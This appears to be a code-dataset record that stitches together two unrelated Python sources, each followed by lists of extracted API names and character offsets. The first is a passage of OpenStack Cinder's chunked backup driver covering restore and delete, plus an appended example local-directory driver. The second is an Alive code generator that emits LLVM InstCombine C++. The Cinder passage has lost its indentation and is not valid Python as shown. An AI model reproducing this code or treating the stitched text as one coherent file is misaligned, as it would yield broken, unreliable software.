if counter == self.data_block_num:
# Send the notification to Ceilometer when the chunk
# number reaches the data_block_num. The backup percentage
# is put in the metadata as the extra information.
self._send_progress_notification(self.context, backup,
object_meta,
total_block_sent_num,
volume_size_bytes)
# Reset the counter
counter = 0
# Stop the timer.
timer.stop()
# All the data have been sent, the backup_percent reaches 100.
self._send_progress_end(self.context, backup, object_meta)
object_sha256['sha256s'] = sha256_list
if backup_metadata:
try:
self._backup_metadata(backup, object_meta)
# Whatever goes wrong, we want to log, cleanup, and re-raise.
except Exception as err:
with excutils.save_and_reraise_exception():
LOG.exception(_LE("Backup volume metadata failed: %s."),
err)
self.delete(backup)
self._finalize_backup(backup, container, object_meta, object_sha256)
def _restore_v1(self, backup, volume_id, metadata, volume_file):
"""Restore a v1 volume backup."""
backup_id = backup['id']
LOG.debug('v1 volume backup restore of %s started.', backup_id)
extra_metadata = metadata.get('extra_metadata')
container = backup['container']
metadata_objects = metadata['objects']
metadata_object_names = sum((obj.keys() for obj in metadata_objects),
[])
LOG.debug('metadata_object_names = %s.', metadata_object_names)
prune_list = [self._metadata_filename(backup),
self._sha256_filename(backup)]
object_names = [object_name for object_name in
self._generate_object_names(backup)
if object_name not in prune_list]
if sorted(object_names) != sorted(metadata_object_names):
err = _('restore_backup aborted, actual object list '
'does not match object list stored in metadata.')
raise exception.InvalidBackup(reason=err)
for metadata_object in metadata_objects:
object_name = metadata_object.keys()[0]
LOG.debug('restoring object. backup: %(backup_id)s, '
'container: %(container)s, object name: '
'%(object_name)s, volume: %(volume_id)s.',
{
'backup_id': backup_id,
'container': container,
'object_name': object_name,
'volume_id': volume_id,
})
with self.get_object_reader(
container, object_name,
extra_metadata=extra_metadata) as reader:
body = reader.read()
compression_algorithm = metadata_object[object_name]['compression']
decompressor = self._get_compressor(compression_algorithm)
volume_file.seek(metadata_object.values()[0]['offset'])
if decompressor is not None:
LOG.debug('decompressing data using %s algorithm',
compression_algorithm)
decompressed = decompressor.decompress(body)
volume_file.write(decompressed)
else:
volume_file.write(body)
# force flush every write to avoid long blocking write on close
volume_file.flush()
# Be tolerant to IO implementations that do not support fileno()
try:
fileno = volume_file.fileno()
except IOError:
LOG.info(_LI("volume_file does not support "
"fileno() so skipping "
"fsync()"))
else:
os.fsync(fileno)
# Restoring a backup to a volume can take some time. Yield so other
# threads can run, allowing for among other things the service
# status to be updated
eventlet.sleep(0)
LOG.debug('v1 volume backup restore of %s finished.',
backup_id)
def restore(self, backup, volume_id, volume_file):
"""Restore the given volume backup from backup repository."""
backup_id = backup['id']
container = backup['container']
object_prefix = backup['service_metadata']
LOG.debug('starting restore of backup %(object_prefix)s '
'container: %(container)s, to volume %(volume_id)s, '
'backup: %(backup_id)s.',
{
'object_prefix': object_prefix,
'container': container,
'volume_id': volume_id,
'backup_id': backup_id,
})
metadata = self._read_metadata(backup)
metadata_version = metadata['version']
LOG.debug('Restoring backup version %s', metadata_version)
try:
restore_func = getattr(self, self.DRIVER_VERSION_MAPPING.get(
metadata_version))
except TypeError:
err = (_('No support to restore backup version %s')
% metadata_version)
raise exception.InvalidBackup(reason=err)
# Build a list of backups based on parent_id. A full backup
# will be the last one in the list.
backup_list = []
backup_list.append(backup)
current_backup = backup
while current_backup['parent_id']:
prev_backup = (self.db.backup_get(
self.context, current_backup['parent_id']))
backup_list.append(prev_backup)
current_backup = prev_backup
# Do a full restore first, then layer the incremental backups
# on top of it in order.
index = len(backup_list) - 1
while index >= 0:
backup1 = backup_list[index]
index = index - 1
metadata = self._read_metadata(backup1)
restore_func(backup1, volume_id, metadata, volume_file)
volume_meta = metadata.get('volume_meta', None)
try:
if volume_meta:
self.put_metadata(volume_id, volume_meta)
else:
LOG.debug("No volume metadata in this backup.")
except exception.BackupMetadataUnsupportedVersion:
msg = _("Metadata restore failed due to incompatible version.")
LOG.error(msg)
raise exception.BackupOperationError(msg)
LOG.debug('restore %(backup_id)s to %(volume_id)s finished.',
{'backup_id': backup_id, 'volume_id': volume_id})
def delete(self, backup):
"""Delete the given backup."""
container = backup['container']
LOG.debug('delete started, backup: %(id)s, container: %(cont)s, '
'prefix: %(pre)s.',
{'id': backup['id'],
'cont': container,
'pre': backup['service_metadata']})
if container is not None:
object_names = []
try:
object_names = self._generate_object_names(backup)
except Exception:
LOG.warning(_LW('swift error while listing objects, continuing'
' with delete.'))
for object_name in object_names:
self.delete_object(container, object_name)
LOG.debug('deleted object: %(object_name)s'
' in container: %(container)s.',
{
'object_name': object_name,
'container': container
})
# Deleting a backup's objects can take some time.
# Yield so other threads can run
eventlet.sleep(0)
LOG.debug('delete %s finished.', backup['id'])
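# --- Example (not part of cinder) ---
# A minimal sketch of a concrete chunked driver that keeps its "chunks" as
# plain files under a local directory, showing how the abstract methods above
# might be implemented. The class name, the backup_path argument, and the
# chunk/block sizes are hypothetical illustrations; note that
# chunk_size_bytes must be a multiple of sha_block_size_bytes (backup()
# enforces this).
class LocalDirBackupDriver(ChunkedBackupDriver):
    """Hypothetical chunked driver backed by a local directory."""
    def __init__(self, context, backup_path, db_driver=None):
        super(LocalDirBackupDriver, self).__init__(
            context,
            chunk_size_bytes=52428800,       # 50 MiB per chunk (illustrative)
            sha_block_size_bytes=32768,      # 32 KiB sha blocks (illustrative)
            backup_default_container='backups',
            enable_progress_timer=True,
            db_driver=db_driver)
        self.backup_path = backup_path
    def put_container(self, container):
        path = os.path.join(self.backup_path, container)
        if not os.path.exists(path):
            os.makedirs(path)
    def get_container_entries(self, container, prefix):
        path = os.path.join(self.backup_path, container)
        return [n for n in os.listdir(path) if n.startswith(prefix)]
    def get_object_writer(self, container, object_name, extra_metadata=None):
        # open() is a context manager, as the base class requires
        return open(os.path.join(self.backup_path, container, object_name), 'wb')
    def get_object_reader(self, container, object_name, extra_metadata=None):
        return open(os.path.join(self.backup_path, container, object_name), 'rb')
    def delete_object(self, container, object_name):
        os.remove(os.path.join(self.backup_path, container, object_name))
    def _generate_object_name_prefix(self, backup):
        return 'backup-%s' % backup['id']
    def update_container_name(self, backup, container):
        return None  # keep whatever container name the backup object carries
    def get_extra_metadata(self, backup, volume):
        return None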
|
[
"oslo_log.log.getLogger",
"os.fsync",
"json.dumps",
"six.add_metaclass",
"cinder.openstack.common.loopingcall.FixedIntervalLoopingCall",
"cinder.i18n._LW",
"cinder.i18n._LI",
"cinder.exception.InvalidBackup",
"cinder.exception.InvalidVolume",
"cinder.i18n._LE",
"json.loads",
"cinder.volume.utils.notify_about_backup_usage",
"hashlib.sha256",
"cinder.i18n._",
"hashlib.md5",
"oslo_config.cfg.StrOpt",
"six.text_type",
"oslo_utils.excutils.save_and_reraise_exception",
"cinder.exception.BackupOperationError",
"eventlet.sleep"
] |
[((1312, 1339), 'oslo_log.log.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (1329, 1339), True, 'from oslo_log import log as logging\n'), ((1583, 1613), 'six.add_metaclass', 'six.add_metaclass', (['abc.ABCMeta'], {}), '(abc.ABCMeta)\n', (1600, 1613), False, 'import six\n'), ((1376, 1487), 'oslo_config.cfg.StrOpt', 'cfg.StrOpt', (['"""backup_compression_algorithm"""'], {'default': '"""zlib"""', 'help': '"""Compression algorithm (None to disable)"""'}), "('backup_compression_algorithm', default='zlib', help=\n 'Compression algorithm (None to disable)')\n", (1386, 1487), False, 'from oslo_config import cfg\n'), ((7608, 7654), 'json.dumps', 'json.dumps', (['metadata'], {'sort_keys': '(True)', 'indent': '(2)'}), '(metadata, sort_keys=True, indent=2)\n', (7618, 7654), False, 'import json\n'), ((8500, 8535), 'six.text_type', 'six.text_type', (["backup['created_at']"], {}), "(backup['created_at'])\n", (8513, 8535), False, 'import six\n'), ((8667, 8715), 'json.dumps', 'json.dumps', (['sha256file'], {'sort_keys': '(True)', 'indent': '(2)'}), '(sha256file, sort_keys=True, indent=2)\n', (8677, 8715), False, 'import json\n'), ((9330, 9355), 'json.loads', 'json.loads', (['metadata_json'], {}), '(metadata_json)\n', (9340, 9355), False, 'import json\n'), ((9914, 9941), 'json.loads', 'json.loads', (['sha256file_json'], {}), '(sha256file_json)\n', (9924, 9941), False, 'import json\n'), ((13790, 13807), 'eventlet.sleep', 'eventlet.sleep', (['(0)'], {}), '(0)\n', (13804, 13807), False, 'import eventlet\n'), ((15522, 15629), 'cinder.volume.utils.notify_about_backup_usage', 'volume_utils.notify_about_backup_usage', (['context', 'backup', '"""createprogress"""'], {'extra_usage_info': 'object_meta'}), "(context, backup, 'createprogress',\n extra_usage_info=object_meta)\n", (15560, 15629), True, 'from cinder.volume import utils as volume_utils\n'), ((16101, 16208), 'cinder.volume.utils.notify_about_backup_usage', 'volume_utils.notify_about_backup_usage', (['context', 'backup', '"""createprogress"""'], {'extra_usage_info': 'object_meta'}), "(context, backup, 'createprogress',\n extra_usage_info=object_meta)\n", (16139, 16208), True, 'from cinder.volume import utils as volume_utils\n'), ((18997, 19051), 'cinder.openstack.common.loopingcall.FixedIntervalLoopingCall', 'loopingcall.FixedIntervalLoopingCall', (['_notify_progress'], {}), '(_notify_progress)\n', (19033, 19051), False, 'from cinder.openstack.common import loopingcall\n'), ((2581, 2623), 'cinder.i18n._', '_', (['"""unsupported compression algorithm: %s"""'], {}), "('unsupported compression algorithm: %s')\n", (2582, 2623), False, 'from cinder.i18n import _, _LE, _LI, _LW\n'), ((10398, 10433), 'cinder.exception.InvalidVolume', 'exception.InvalidVolume', ([], {'reason': 'err'}), '(reason=err)\n', (10421, 10433), False, 'from cinder import exception\n'), ((16685, 16749), 'cinder.i18n._', '_', (['"""Chunk size is not multiple of block size for creating hash."""'], {}), "('Chunk size is not multiple of block size for creating hash.')\n", (16686, 16749), False, 'from cinder.i18n import _, _LE, _LI, _LW\n'), ((16791, 16826), 'cinder.exception.InvalidBackup', 'exception.InvalidBackup', ([], {'reason': 'err'}), '(reason=err)\n', (16814, 16826), False, 'from cinder import exception\n'), ((24108, 24207), 'cinder.i18n._', '_', (['"""restore_backup aborted, actual object list does not match object list stored in metadata."""'], {}), "('restore_backup aborted, actual object list does not match object list stored in metadata.'\n )\n", (24109, 24207), False, 'from cinder.i18n import _, _LE, _LI, _LW\n'), ((24244, 24279), 'cinder.exception.InvalidBackup', 'exception.InvalidBackup', ([], {'reason': 'err'}), '(reason=err)\n', (24267, 24279), False, 'from cinder import exception\n'), ((26245, 26262), 'eventlet.sleep', 'eventlet.sleep', (['(0)'], {}), '(0)\n', (26259, 26262), False, 'import eventlet\n'), ((10331, 10362), 'cinder.i18n._', '_', (['"""volume size %d is invalid."""'], {}), "('volume size %d is invalid.')\n", (10332, 10362), False, 'from cinder.i18n import _, _LE, _LI, _LW\n'), ((13410, 13427), 'hashlib.md5', 'hashlib.md5', (['data'], {}), '(data)\n', (13421, 13427), False, 'import hashlib\n'), ((17757, 17792), 'cinder.exception.InvalidBackup', 'exception.InvalidBackup', ([], {'reason': 'err'}), '(reason=err)\n', (17780, 17792), False, 'from cinder import exception\n'), ((18012, 18079), 'cinder.i18n._', '_', (['"""Volume size increased since the last backup. Do a full backup."""'], {}), "('Volume size increased since the last backup. Do a full backup.')\n", (18013, 18079), False, 'from cinder.i18n import _, _LE, _LI, _LW\n'), ((18129, 18164), 'cinder.exception.InvalidBackup', 'exception.InvalidBackup', ([], {'reason': 'err'}), '(reason=err)\n', (18152, 18164), False, 'from cinder import exception\n'), ((26025, 26041), 'os.fsync', 'os.fsync', (['fileno'], {}), '(fileno)\n', (26033, 26041), False, 'import os\n'), ((27449, 27484), 'cinder.exception.InvalidBackup', 'exception.InvalidBackup', ([], {'reason': 'err'}), '(reason=err)\n', (27472, 27484), False, 'from cinder import exception\n'), ((30102, 30119), 'eventlet.sleep', 'eventlet.sleep', (['(0)'], {}), '(0)\n', (30116, 30119), False, 'import eventlet\n'), ((17414, 17552), 'cinder.i18n._', '_', (['"""Hash block size has changed since the last backup. New hash block size: %(new)s. Old hash block size: %(old)s. Do a full backup."""'], {}), "('Hash block size has changed since the last backup. New hash block size: %(new)s. Old hash block size: %(old)s. Do a full backup.'\n )\n", (17415, 17552), False, 'from cinder.i18n import _, _LE, _LI, _LW\n'), ((27347, 27391), 'cinder.i18n._', '_', (['"""No support to restore backup version %s"""'], {}), "('No support to restore backup version %s')\n", (27348, 27391), False, 'from cinder.i18n import _, _LE, _LI, _LW\n'), ((28630, 28687), 'cinder.i18n._', '_', (['"""Metadata restore failed due to incompatible version."""'], {}), "('Metadata restore failed due to incompatible version.')\n", (28631, 28687), False, 'from cinder.i18n import _, _LE, _LI, _LW\n'), ((28741, 28776), 'cinder.exception.BackupOperationError', 'exception.BackupOperationError', (['msg'], {}), '(msg)\n', (28771, 28776), False, 'from cinder import exception\n'), ((19827, 19848), 'hashlib.sha256', 'hashlib.sha256', (['chunk'], {}), '(chunk)\n', (19841, 19848), False, 'import hashlib\n'), ((22920, 22957), 'oslo_utils.excutils.save_and_reraise_exception', 'excutils.save_and_reraise_exception', ([], {}), '()\n', (22955, 22957), False, 'from oslo_utils import excutils\n'), ((25861, 25925), 'cinder.i18n._LI', '_LI', (['"""volume_file does not support fileno() so skipping fsync()"""'], {}), "('volume_file does not support fileno() so skipping fsync()')\n", (25864, 25925), False, 'from cinder.i18n import _, _LE, _LI, _LW\n'), ((29477, 29542), 'cinder.i18n._LW', '_LW', (['"""swift error while listing objects, continuing with delete."""'], {}), "('swift error while listing objects, continuing with delete.')\n", (29480, 29542), False, 'from cinder.i18n import _, _LE, _LI, _LW\n'), ((22993, 23034), 'cinder.i18n._LE', '_LE', (['"""Backup volume metadata failed: %s."""'], {}), "('Backup volume metadata failed: %s.')\n", (22996, 23034), False, 'from cinder.i18n import _, _LE, _LI, _LW\n')]
|
# Copyright 2014-2015 The Alive authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse, glob, re, sys
from asdl.lang.alive_lang.alive.language import *
from asdl.lang.alive_lang.alive.precondition import *
from asdl.lang.alive_lang.alive.parser import parse_opt_file
from asdl.lang.alive_lang.alive.codegen import *
from itertools import combinations, count
from collections import defaultdict
DO_STATS = True
SIMPLIFY = True
LIMITER = False
def get_most_specific_type(t1, t2):
def _mismatch(c):
if c:
raise AliveError('Incomparable types: {0}, {1}'.format(type_str(t1), type_str(t2)))
if isinstance(t1, UnknownType):
try:
if isinstance(t2, IntType):
return get_most_specific_type(t1.types[Type.Int], t2)
if isinstance(t2, PtrType):
return get_most_specific_type(t1.types[Type.Ptr], t2)
if isinstance(t2, ArrayType):
return get_most_specific_type(t1.types[Type.Array], t2)
except KeyError:
_mismatch(True)
# TODO: return t1 or t2 when possible?
types = [(s, get_most_specific_type(t, t2.types[s]))
for (s,t) in t1.types.items() if s in t2.types]
_mismatch(not types)
if len(types) == 1:
return types[0][1]
t3 = UnknownType()
t3.types = dict(types)
return t3
if isinstance(t2, UnknownType):
return get_most_specific_type(t2,t1)
_mismatch(t1.__class__ != t2.__class__)
if isinstance(t1, IntType):
_mismatch(t1.defined and t2.defined and
t1.getSize() != t2.getSize())
return t1 if t1.defined else t2
if isinstance(t1, PtrType):
# TODO: return t1 or t2 when possible?
return PtrType(get_most_specific_type(t1.type, t2.type))
if isinstance(t1, ArrayType):
#sys.stderr.write('WARNING: get_most_specific_type of ArrayTypes\n')
return t1 # FIXME
#TODO: array types?
_mismatch(True)
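# A hedged illustration (not in the original file) of the type meet above,
# assuming Alive's IntType takes an optional bit width (IntType() being an
# integer of unknown width): meeting a defined i8 with an undefined iN
# yields the defined i8.
def _demo_most_specific_type():
  t = get_most_specific_type(IntType(8), IntType())
  assert type_str(t) == 'i8'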
class CodeGenerator(object):
Source, Target = list(range(2))
PtrConstantInt = CPtrType(CTypeName('ConstantInt'))
PtrValue = CPtrType(CTypeName('Value'))
PtrInstruction = CPtrType(CTypeName('Instruction'))
def __init__(self):
self.fresh = 0
self.value_names = {} # value -> name
self.key_names = {} # key -> name
self.names = set() # all created names
self.name_type = {} # name -> ctype
self.reps = {} # value -> value
self.required = {} # value -> type
self.guaranteed = {} # value -> type
self.named_types = defaultdict(set)
self.phase = CodeGenerator.Source
self.clauses = []
def dump(self, title):
from pprint import pprint
def lookup(v):
if v == None: return None
return self.value_names.get(v, '<' + v.getUniqueName() + '>')
print('----', title)
print('value_names:', end=' ')
pprint(set([(v.getUniqueName(),n) for v,n in self.value_names.items()]))
print('key_names:', end=' ')
pprint(self.key_names)
print('names:', end=' ')
pprint(self.names)
print('bound: ', end=' ')
pprint(dict([(n,str(t)) for (n,t) in self.name_type.items()]))
print('reps:', end=' ')
pprint(dict([(lookup(v), lookup(r)) for (v,r) in self.reps.items()]))
print('required:', end=' ')
pprint(dict([(lookup(v), type_str(t)) for v,t in self.required.items()]))
print('guaranteed:', end=' ')
pprint(dict([(lookup(v), type_str(t)) for v,t in self.guaranteed.items()]))
print('named_types:', end=' ')
pprint(self.named_types)
print('----')
def get_name(self, value):
'Return the name for this value, creating one if needed'
assert isinstance(value, (Input, Instr))
if value in self.value_names:
return self.value_names[value]
name = self.new_name(value.getName())
self.value_names[value] = name
return name
def get_key_name(self, key):
'Return the name for this key, creating one if needed'
if key in self.key_names:
return self.key_names[key]
name = self.new_name(key)
self.key_names[key] = name
return name
def bound(self, var):
'Returns whether the name or value is currently bound'
if isinstance(var, Value):
return var in self.value_names and \
self.value_names[var] in self.name_type
return var in self.name_type
def get_cexp(self, var):
'Return a CExp referring to this name or value'
if isinstance(var, Constant):
return var.get_Value(self)
if isinstance(var, Value):
var = self.get_name(var)
#assert var in self.name_type
return CVariable(var)
def get_rep(self, value):
"Return the representative for this value's type"
if value not in self.reps:
self.reps[value] = None
return value
if self.reps[value] == None:
return value
rep = self.get_rep(self.reps[value])
self.reps[value] = rep
return rep
def get_llvm_type(self, value):
"Return a CExpression giving the value's LLVM type"
rep = self.get_rep(value)
assert(self.bound(rep))
return self.get_cexp(rep).arr('getType', [])
def get_ctype(self, name):
"Return this name's type as a CType"
return self.name_type[name]
keywords = {'alignas', 'alignof', 'and', 'and_eq',
'asm', 'auto', 'bitand', 'bitor', 'bool', 'break',
'case', 'catch', 'char', 'char16_t', 'char32_t',
'class', 'compl', 'const', 'constexpr', 'const_cast',
'continue', 'decltype', 'default', 'delete', 'do',
'double', 'dynamic_cast', 'else', 'enum', 'explicit',
'export', 'extern', 'false', 'float', 'for', 'friend',
'goto', 'if', 'inline', 'int', 'long', 'mutable',
'namespace', 'new', 'noexcept', 'not', 'not_eq',
'nullptr', 'operator', 'or', 'or_eq', 'private',
'protected', 'public', 'register', 'reinterpret_cast',
'return', 'short', 'signed', 'sizeof', 'static',
'static_assert', 'static_cast', 'struct', 'switch',
'template', 'this', 'thread_local', 'throw', 'true',
'try', 'typedef', 'typeid', 'typename', 'union',
'unsigned', 'using', 'virtual', 'void', 'volatile',
'wchar_t', 'while', 'xor', 'xor_eq'}
#TODO: add variables/macros known to be in scope?
def new_name(self, hint=None):
"Return a fresh name, related to the hint if given"
if hint:
# remove non-ident characters
hint = re.sub('[^a-zA-Z0-9_]', '', hint)
# remove double underscores and initial and final underscores
hint = re.sub('__+', '_', hint)
hint = re.sub('^_|_$', '', hint)
if not hint:
hint = 'V'
elif hint[0].isdigit() or hint in self.keywords:
hint = '_' + hint
name = hint
while name in self.names:
name = hint + '_' + str(self.fresh)
self.fresh += 1
self.names.add(name)
return name
@staticmethod
def value_ctype(value):
if isinstance(value, Input) and value.name[0] == 'C':
return CodeGenerator.PtrConstantInt
return CodeGenerator.PtrValue
def bind_value(self, value):
"Add this value to the set of bound names"
assert isinstance(value, (Input, Instr))
ctype = self.value_ctype(value)
name = self.get_name(value)
self.bind_name(name, ctype)
def bind_name(self, name, ctype):
"Add this name to the set of bound names"
assert name not in self.name_type
assert isinstance(name, str)
if name not in self.names:
name = self.new_name(name)
self.name_type[name] = ctype
def register_type(self, value, actual, minimal):
"Set the LLVM type constraints for this value"
rep = self.get_rep(value)
if isinstance(actual, NamedType):
self.named_types[actual.name].add(rep)
actual = actual.type
if isinstance(minimal, NamedType):
minimal = minimal.type # should never happen
# ensure that the actual type is at least as specific as the minimal type
actual = get_most_specific_type(actual, minimal)
if rep in self.required:
self.required[rep] = get_most_specific_type(actual, self.required[rep])
else:
self.required[rep] = actual
if self.phase == self.Source:
if rep in self.guaranteed:
self.guaranteed[rep] = get_most_specific_type(minimal, self.guaranteed[rep])
else:
self.guaranteed[rep] = minimal
def unify(self, *values):
"Constrain the given values to have the same LLVM type"
it = iter(values)
v1 = next(it)
r1 = self.get_rep(v1)
for v2 in it:
r2 = self.get_rep(v2)
if r1 is r2:
continue
if self.phase != self.Source and self.bound(r1) and self.bound(r2):
self.clauses.append(
CBinExpr('==', self.get_llvm_type(r1), self.get_llvm_type(r2)))
if self.bound(r2) and not self.bound(r1):
r1, r2 = r2, r1
self.reps[r2] = r1
if r2 in self.required:
self.required[r1] = get_most_specific_type(self.required[r1], self.required[r2])
del self.required[r2]
if r2 in self.guaranteed:
self.guaranteed[r1] = get_most_specific_type(self.guaranteed[r1], self.guaranteed[r2])
del self.guaranteed[r2]
class MatchBuilder(object):
CTypeName = CTypeName
def __init__(self, manager, value):
self.manager = manager
self.value = value
self.bound = []
self.extras = []
def get_my_ref(self):
return self.manager.get_cexp(self.value)
def new_name(self, hint=None):
'Create a fresh name'
return self.manager.new_name(hint)
def simple_match(self, matcher, *subpatterns):
return CFunctionCall('match',
self.get_my_ref(),
CFunctionCall(matcher, *subpatterns))
def binding(self, name, ctype):
'''Bind this variable, returning a CExpr subpattern.
NOTE: If the name is already bound, this will return a fresh name
and add a requirement that the new name equal the old one.
'''
if self.manager.bound(name):
# create a new name and bind it
new_name = self.manager.new_name(name)
# add the equality constraint
self.extras.append(CBinExpr('==', CVariable(new_name), CVariable(name)))
#TODO: check that the types are equal
name = new_name
self.manager.bind_name(name, ctype)
return CVariable(name)
def subpattern(self, value):
'Return a CExpr which matches the operand value and binds its variable'
if isinstance(value, ConstantVal):
self.bound.append(value)
return CFunctionCall('m_SpecificInt', CVariable(str(value.val)))
# NOTE: using m_Zero is unadvisable here, because it matches null
assert isinstance(value, (Instr, Input))
if value not in self.bound:
if self.manager.bound(value):
return CFunctionCall('m_Specific', self.manager.get_cexp(value))
self.bound.append(value)
self.manager.bind_value(value)
name = self.manager.get_name(value)
else:
# create a new value and require it equal the old one
name = self.manager.new_name(value.getName())
self.manager.bind_name(name, self.manager.value_ctype(value))
self.extras.append(CBinExpr('==', self.manager.get_cexp(value), CVariable(name)))
# TODO: better to look up the ctype?
if value.name[0] == 'C':
return CFunctionCall('m_ConstantInt', CVariable(name))
return CFunctionCall('m_Value', CVariable(name))
def type_str(atype):
if isinstance(atype, IntType):
if atype.defined:
return 'i' + str(atype.size)
return 'iN'
if isinstance(atype, PtrType):
return type_str(atype.type) + '*'
if isinstance(atype, ArrayType):
return type_str(atype.type) + '[]'
if isinstance(atype, UnknownType):
return '(' + '|'.join(type_str(t) for t in list(atype.types.values())) + ')'
return '?'
def get_root(src):
values = list(src.values())
root = values.pop()
while not isinstance(root, Instr):
root = values.pop()
return root
def match_value(value, manager):
mb = MatchBuilder(manager, value)
exp = value.visit_source(mb)
if mb.extras:
exp = CBinExpr('&&', exp, CBinExpr.reduce('&&', mb.extras))
return exp, mb.bound
def minimal_type_constraints(ty_exp, required, guaranteed):
# TODO: simplify this
if isinstance(required, IntType):
if not isinstance(guaranteed, IntType):
if required.defined:
return [CFunctionCall('isa<IntegerType>', ty_exp),
CBinExpr('==',
ty_exp.arr('getScalarSizeInBits', []),
CVariable(str(required.size)))]
return [CFunctionCall('isa<IntegerType>', ty_exp)]
if required.defined and not guaranteed.defined:
return [CBinExpr('==',
ty_exp.arr('getScalarSizeInBits', []),
CVariable(str(required.size)))]
return []
if isinstance(required, PtrType):
if not isinstance(guaranteed, PtrType):
raise AliveError("Pointer types not supported")
return []
if isinstance(required, ArrayType):
raise AliveError("Array types not supported")
assert(isinstance(required, UnknownType))
reqs = list(required.types.keys())
reqs.sort()
guars = list(guaranteed.types.keys())
guars.sort()
if reqs == [Type.Int, Type.Ptr] and Type.Array in guars:
return [CVariable('<int-or-ptr>')]
return []
#FIXME: should handle all types
def generate_opt(rule, opt, out):
#TODO: break into smaller pieces
#TODO: handle multiple replacement patterns
name, pre, src_bb, tgt_bb, src, tgt, src_used, tgt_used, tgt_skip = opt
if len(src_bb) != 1 or len(tgt_bb) != 1:
raise AliveError("codegen can't handle multiple basic blocks: " + name)
root = get_root(src)
cg = CodeGenerator()
cg.value_names[root] = 'I'
cg.bind_value(root)
todo = [root]
clauses = []
while todo:
val = todo.pop()
if isinstance(val, Instr):
exp, new_vals = match_value(val, cg)
clauses.append(exp)
todo.extend(reversed(new_vals))
val.register_types(cg)
cg.phase = cg.Target
pre.register_types(cg)
# ensure named types are unified
for name in cg.named_types:
cg.unify(*cg.named_types[name])
tgt_vals = [v for k,v in tgt.items() if not (isinstance(v,Input) or k in tgt_skip)]
for value in tgt_vals:
value.register_types(cg)
root_name = root.getName()
new_root = tgt[root_name]
cg.unify(root, new_root)
clauses.extend(cg.clauses)
for v,t in cg.guaranteed.items():
if not cg.bound(v): continue
clauses.extend(minimal_type_constraints(cg.get_llvm_type(v), cg.required[v], t))
if not isinstance(pre, TruePred):
clauses.append(pre.visit_pre(cg))
if DO_STATS and LIMITER:
clauses.append(CBinExpr('<', CVariable('Rule' + str(rule)), CVariable('10000')))
body = []
if DO_STATS:
body = [CUnaryExpr('++', CVariable('Rule' + str(rule)))]
for value in tgt_vals:
if isinstance(value, Instr) and value != new_root:
body.extend(value.visit_target(cg, True))
if isinstance(new_root, CopyOperand):
body.append(
CDefinition.init(
cg.PtrInstruction,
cg.get_cexp(tgt[root_name]),
CFunctionCall('replaceInstUsesWith', CVariable('*I'), cg.get_cexp(new_root.v))))
else:
body.extend(new_root.visit_target(cg, False))
body.append(CReturn(cg.get_cexp(new_root)))
cif = CIf(CBinExpr.reduce('&&', clauses), body).format()
decl_it = CDefinition.block((t, CVariable(v))
for v,t in cg.name_type.items() if v != 'I')
decl = iter_seq(line + d.format() for d in decl_it)
code = nest(2,
seq(line, '{ // ', name,
nest(2, seq(decl, line, line, cif)), line, '}'))
out.write(code.format())
def generate_suite(opts, out):
opts = list(zip(count(1), opts))
# gather names of testcases
if DO_STATS:
for rule, opt in opts:
name = opt[0]
# TODO: abstract this
src_root = get_root(opt[4]).getOpName()
# FIXME: sanitize name
out.write('STATISTIC(Rule{0}, "{0}. {1} {2}");\n'.format(rule, src_root, name))
out.write('\n')
out.write('Instruction *InstCombiner::runOnInstruction(Instruction *I) {\n')
if SIMPLIFY:
out.write('''
if (Value *V = SimplifyInstruction(I, SQ)) {
return replaceInstUsesWith(*I, V);
}
''')
for rule, opt in opts:
generate_opt(rule, opt, out)
out.write('\n\n return nullptr;\n}\n')
llvm_opcode = {
'add': 'Instruction::Add',
'sub': 'Instruction::Sub',
'mul': 'Instruction::Mul',
'sdiv': 'Instruction::SDiv',
'srem': 'Instruction::SRem',
'udiv': 'Instruction::UDiv',
'urem': 'Instruction::URem',
'shl': 'Instruction::Shl',
'lshr': 'Instruction::LShr',
'ashr': 'Instruction::AShr',
'and': 'Instruction::And',
'or': 'Instruction::Or',
'xor': 'Instruction::Xor',
'sext': 'Instruction::SExt',
'zext': 'Instruction::ZExt',
'trunc': 'Instruction::Trunc',
'ptrtoint': 'Instruction::PtrToInt',
'inttoptr': 'Instruction::IntToPtr',
'bitcast': 'Instruction::BitCast',
'icmp': 'Instruction::ICmp',
'select': 'Instruction::Select',
}
def generate_switched_suite(opts, out):
root_opts = defaultdict(list)
opts = list(zip(count(1), opts))
# gather names of testcases
if DO_STATS:
for rule, opt in opts:
name = opt[0]
# TODO: abstract this
src_root = get_root(opt[4]).getOpName()
# FIXME: sanitize name
out.write('STATISTIC(Rule{0}, "{1}.{0}. {2}");\n'.format(rule, src_root, name))
out.write('Instruction *InstCombiner::runOnInstruction(Instruction *I) {\n')
if SIMPLIFY:
out.write('''
if (Value *V = SimplifyInstruction(I, SQ)) {
return replaceInstUsesWith(*I, V);
}
''')
out.write(' switch (I->getOpcode()) {\n default: break;\n')
# sort opts by root opcode
for opt in opts:
root_opts[get_root(opt[1][4]).getOpName()].append(opt)
for root, opts in root_opts.items():
if root not in llvm_opcode:
continue
out.write(' case {0}:\n'.format(llvm_opcode[root]))
for rule, opt in opts:
generate_opt(rule, opt, out)
out.write('\n break;\n\n')
out.write('''
}
return nullptr;
}
''')
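# A hedged convenience wrapper (not in the original file): run the switched
# suite generator over a string of Alive patterns and return the generated
# C++ as a string, instead of streaming to stdout as __main__ does below.
def generate_to_string(opt_text):
  import io
  buf = io.StringIO()
  generate_switched_suite(parse_opt_file(opt_text), buf)
  return buf.getvalue()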
if __name__ == '__main__':
input = sys.stdin.read()
generate_switched_suite(parse_opt_file(input), sys.stdout)
|
[
"sys.stdin.read",
"asdl.lang.alive_lang.alive.parser.parse_opt_file",
"itertools.count",
"collections.defaultdict",
"pprint.pprint",
"re.sub"
] |
